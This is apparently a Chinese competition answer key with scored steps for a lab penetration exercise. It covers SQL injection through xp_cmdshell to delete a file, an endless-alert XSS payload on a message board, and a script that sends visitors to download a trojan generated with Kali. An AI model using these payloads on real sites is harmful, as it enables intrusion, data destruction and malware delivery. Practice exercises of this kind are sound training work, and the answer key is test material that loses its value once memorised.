通过:‘execmaster.dbo.xp_cmdshell‘delc:\1.txt’—再次进行SQL注入截图;系统出现错误提示:BadKeyWord!(截图)(5分)任务2:XSS和CSRF攻防(65分)1.Web访问DCST中的WebServ2003服务器,"/"->"EmployeeMessageBoard",分析该页面源程序,找到提交的变量名,并截图;(5分)找到源程序:(2分)含有页面标题:<title>MessageBoard</title>找到提交的变量名:(3分)name="MessageUsername"name="message"2.对该任务题目1页面注入点进行XSS渗透测试,并进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)构造注入代码:(2分)<script>while(1){alert("Hacker!");};</script>测试注入成功:(3分)弹出alert("Hacker!")括号中的消息;3.对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(/)中的木马程序:/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)构造注入代码:(2分)<script>location.href="/TrojanHorse.exe";</script>测试过程:(3分)名称:trojanhorse.exe发送者:4.通过IIS搭建网站(/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(/)的结果截图;(5分)搭建IIS(1分)信息服务:网站目录下存放:trojanhorse.exe搭建DNS(1分)
全文预览
